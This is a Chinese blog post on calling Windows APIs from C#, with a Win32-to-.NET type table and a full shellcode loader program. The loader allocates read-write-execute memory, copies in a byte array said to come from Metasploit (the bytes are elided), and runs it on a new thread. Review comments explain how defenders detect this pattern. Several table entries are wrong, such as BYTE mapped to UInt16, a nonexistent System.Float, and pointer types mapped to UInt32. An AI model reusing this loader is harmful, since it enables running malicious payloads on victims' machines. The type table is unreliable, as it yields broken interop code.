
c# 调用Windows API - nice_0e3

博客园 - nice_0e3


2024-07-20

c# 调用Windows API

前言

看点代码安抚浮躁的心

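对应表

注意:表中把指针或指针大小的类型(如 LPVOID、PVOID、SIZE_T)映射为 System.UInt32 的条目只在 32 位进程中成立;在 64 位进程中这些类型为 8 字节,应使用 System.IntPtr 或 System.UIntPtr。

API数据类型

调用 Windows API 时对应的 .NET 数据类型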

BOOL

System.Int32

BOOLEAN

System.Int32

BYTE

System.UInt16

COLORREF

System.UInt32

DWORD

System.UInt32

DWORD32

System.UInt32

DWORD64

System.UInt64

FLOAT

System.Float

HACCEL

System.IntPtr

HANDLE

System.IntPtr

HBITMAP

System.IntPtr

HBRUSH

System.IntPtr

HCONV

System.IntPtr

HCONVLIST

System.IntPtr

HCURSOR

System.IntPtr

HDC

System.IntPtr

HDDEDATA

System.IntPtr

HDESK

System.IntPtr

HDROP

System.IntPtr

HDWP

System.IntPtr

HENHMETAFILE

System.IntPtr

HFILE

System.IntPtr

HFONT

System.IntPtr

HGDIOBJ

System.IntPtr

HGLOBAL

System.IntPtr

HHOOK

System.IntPtr

HICON

System.IntPtr

HIMAGELIST

System.IntPtr

HIMC

System.IntPtr

HINSTANCE

System.IntPtr

HKEY

System.IntPtr

HLOCAL

System.IntPtr

HMENU

System.IntPtr

HMETAFILE

System.IntPtr

HMODULE

System.IntPtr

HMONITOR

System.IntPtr

HPALETTE

System.IntPtr

HPEN

System.IntPtr

HRGN

System.IntPtr

HRSRC

System.IntPtr

HSZ

System.IntPtr

HWINSTA

System.IntPtr

HWND

System.IntPtr

INT

System.Int32

INT32

System.Int32

INT64

System.Int64

LONG

System.Int32

LONG32

System.Int32

LONG64

System.Int64

LONGLONG

System.Int64

LPARAM

System.IntPtr

LPBOOL

System.Int16[]

LPBYTE

System.UInt16[]

LPCOLORREF

System.UInt32[]

LPCSTR

System.String

LPCTSTR

System.String

LPCVOID

System.UInt32

LPCWSTR

System.String

LPDWORD

System.UInt32[]

LPHANDLE

System.UInt32

LPINT

System.Int32[]

LPLONG

System.Int32[]

LPSTR

System.String

LPTSTR

System.String

LPVOID

System.UInt32

LPWORD

System.Int32[]

LPWSTR

System.String

LRESULT

System.IntPtr

PBOOL

System.Int16[]

PBOOLEAN

System.Int16[]

PBYTE

System.UInt16[]

PCHAR

System.Char[]

PCSTR

System.String

PCTSTR

System.String

PCWCH

System.UInt32

PCWSTR

System.UInt32

PDWORD

System.Int32[]

PFLOAT

System.Float[]

PHANDLE

System.UInt32

PHKEY

System.UInt32

PINT

System.Int32[]

PLCID

System.UInt32

PLONG

System.Int32[]

PLUID

System.UInt32

PSHORT

System.Int16[]

PSTR

System.String

PTBYTE

System.Char[]

PTCHAR

System.Char[]

PTSTR

System.String

PUCHAR

System.Char[]

PUINT

System.UInt32[]

PULONG

System.UInt32[]

PUSHORT

System.UInt16[]

PVOID

System.UInt32

PWCHAR

System.Char[]

PWORD

System.Int16[]

PWSTR

System.String

REGSAM

System.UInt32

SC_HANDLE

System.IntPtr

SC_LOCK

System.IntPtr

SHORT

System.Int16

SIZE_T

System.UInt32

SSIZE_T

System.UInt32

TBYTE

System.Char

TCHAR

System.Char

UCHAR

System.Byte

UINT

System.UInt32

UINT32

System.UInt32

UINT64

System.UInt64

ULONG

System.UInt32

ULONG32

System.UInt32

ULONG64

System.UInt64

ULONGLONG

System.UInt64

USHORT

System.UInt16

WORD

System.UInt16

WPARAM

System.IntPtr

LPTHREAD_START_ROUTINE

UInt32

LPSECURITY_ATTRIBUTES

LPSECURITY_ATTRIBUTES

案例1

// P/Invoke binding for kernel32!VirtualAlloc.
// NOTE(review): the native return value (LPVOID), lpAddress (LPVOID) and dwSize (SIZE_T) are
// pointer-sized, so the UInt32 types used here only match a 32-bit process; IntPtr/UIntPtr
// are the usual marshalling types for them.
[DllImport("kernel32", EntryPoint = "VirtualAlloc")] // import the VirtualAlloc function from kernel32.dll
public static extern UInt32 VirtualAlloc(UInt32 lpAddress, uint dwSize, UInt32 flAllocationType, UInt32 flProtect);// declare the Win32 API function

...
// Call site.
// 0x00001000 is the allocation type and 0x40 the page protection; the variant below names
// them MEM_COMMIT and PAGE_EXECUTE_READWRITE.
// NOTE(review): the return value is not checked here; VirtualAlloc returns 0 (NULL) on failure.
 UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length, 0x00001000, 0x40);

// The same call written with named constants instead of magic numbers.

  private static UInt32 MEM_COMMIT = 0x1000;
  // Writable and executable at the same time: memory with this protection is something
  // endpoint monitoring commonly flags, because ordinary managed code rarely needs it.
  private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;

  UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length,MEM_COMMIT, PAGE_EXECUTE_READWRITE);

extern 修饰符用于声明在外部实现的方法。它的常见用法是在通过 Interop 服务调用非托管代码时与 DllImport 特性一起使用;在这种情况下,还必须将方法声明为 static。

完整代码

// Entry point of the sample: allocates a read/write/execute region with VirtualAlloc, copies
// a byte array into it with Marshal.Copy, starts a native thread at that address with
// CreateThread, and blocks until the thread ends.
//
// Review notes:
//  - The allocate(RWX) -> copy -> CreateThread sequence is a well-known in-process code
//    execution pattern. It is routinely monitored by endpoint security products, and Windows
//    process mitigation policies such as Arbitrary Code Guard are designed to block the
//    creation of dynamic executable memory.
//  - No return value is checked: a failed VirtualAlloc (0) or CreateThread (IntPtr.Zero)
//    is passed straight to the next call.
//  - The thread handle is never passed to CloseHandle and the region is never released with
//    VirtualFree, although both are declared in this class.
//  - funcAddr is a UInt32, so the address is only represented correctly in a 32-bit process.
static void Main(string[] args)
        {
            // Compiled native code; the comment in the original says it was generated with
            // Metasploit. The bytes are elided on the page: as written, the empty initializer
            // does not match the declared length of 892, so this line does not compile.
            byte[] shellcode = new byte[892] {  };
           
            
            
            // Earlier, incomplete drafts of the two calls below (left commented out by the author).
            //UInt32 funcAddr=   VirtualAlloc(0, (uint)shellcode.Length,);
            //CreateThread(0,0, funcAddr,);
      
            // Commit a region the size of the array with read/write/execute protection.
            UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length,MEM_COMMIT, PAGE_EXECUTE_READWRITE);
            // Copy the managed byte array into the unmanaged region.
            Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length);
            IntPtr hThread = IntPtr.Zero;
            UInt32 threadId = 0;
            // No argument is passed to the thread routine (null parameter pointer).
            IntPtr pinfo = IntPtr.Zero;
            // Start a thread whose start address is the copied buffer; default security
            // attributes, default stack size, and creation flags 0.
            hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId); 
            // 0xFFFFFFFF is INFINITE: wait with no timeout for the thread to finish.
            WaitForSingleObject(hThread, 0xFFFFFFFF);
        }
        // flAllocationType value passed to VirtualAlloc in Main.
        private static UInt32 MEM_COMMIT = 0x1000;
        // flProtect value passed to VirtualAlloc in Main: the region is readable, writable and
        // executable at once, which is a common detection signal for injected code.
        private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
        // P/Invoke binding for kernel32!VirtualAlloc; returns the base address of the
        // allocated region, or 0 on failure.
        // NOTE(review): the native return type (LPVOID), lpStartAddr (LPVOID) and size (SIZE_T)
        // are pointer-sized; UInt32 truncates them in a 64-bit process. IntPtr/UIntPtr are the
        // usual marshalling types.
        [DllImport("kernel32")]
        private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr,
        UInt32 size, UInt32 flAllocationType, UInt32 flProtect);
        // P/Invoke binding for kernel32!VirtualFree. Declared but not called in the code shown,
        // so the region allocated in Main is never released.
        // NOTE(review): dwSize is SIZE_T natively (pointer-sized), not a 32-bit value.
        [DllImport("kernel32")] 
        private static extern bool VirtualFree(IntPtr lpAddress,
        UInt32 dwSize, UInt32 dwFreeType);
        // P/Invoke binding for kernel32!CreateThread; returns the new thread's handle, or
        // IntPtr.Zero on failure.
        // NOTE(review): lpThreadAttributes (LPSECURITY_ATTRIBUTES), dwStackSize (SIZE_T) and
        // lpStartAddress (LPTHREAD_START_ROUTINE) are pointer-sized natively; declaring them as
        // UInt32 is only correct in a 32-bit process.
        [DllImport("kernel32")]
        private static extern IntPtr CreateThread(
        UInt32 lpThreadAttributes,  // Main passes 0
        UInt32 dwStackSize,         // Main passes 0
        UInt32 lpStartAddress,      // address at which the new thread starts executing
        IntPtr param,               // argument handed to the thread routine
        UInt32 dwCreationFlags,     // Main passes 0
        ref UInt32 lpThreadId       // receives the identifier of the new thread
        );
        // P/Invoke binding for kernel32!CloseHandle. Declared but not called in the code shown,
        // so the thread handle obtained in Main is never closed.
        [DllImport("kernel32")]
        private static extern bool CloseHandle(IntPtr handle);
        // P/Invoke binding for kernel32!WaitForSingleObject; blocks until the object behind
        // hHandle is signaled or the timeout elapses, and returns the wait result code.
        [DllImport("kernel32")]
        private static extern UInt32 WaitForSingleObject(
        IntPtr hHandle,
        UInt32 dwMilliseconds  // timeout in milliseconds; Main passes 0xFFFFFFFF (INFINITE)
        );
        // P/Invoke binding for kernel32!GetModuleHandle. Not called in the code shown.
        // NOTE(review): no CharSet is specified on the attribute, so the string is marshalled
        // with the default (ANSI) character set.
        [DllImport("kernel32")]
        private static extern IntPtr GetModuleHandle(
        string moduleName
        );
        // P/Invoke binding for kernel32!GetProcAddress. Not called in the code shown.
        // NOTE(review): the native return value is a function pointer (FARPROC); a UInt32
        // return type truncates it in a 64-bit process. IntPtr is the usual marshalling type.
        [DllImport("kernel32")]
        private static extern UInt32 GetProcAddress(
        IntPtr hModule,
        string procName
        );
        // P/Invoke binding for kernel32!LoadLibrary. Not called in the code shown.
        // NOTE(review): the native return value is a module handle (HMODULE), which is
        // pointer-sized; UInt32 truncates it in a 64-bit process. IntPtr is the usual
        // marshalling type.
        [DllImport("kernel32")]
        private static extern UInt32 LoadLibrary(
        string lpFileName
        );
        // P/Invoke binding for kernel32!GetLastError. Not called in the code shown.
        // NOTE(review): calling GetLastError directly from managed code is unreliable because
        // the runtime may make its own API calls in between; the documented approach is
        // SetLastError = true on the DllImport plus Marshal.GetLastWin32Error().
        [DllImport("kernel32")]
        private static extern UInt32 GetLastError();
  }

}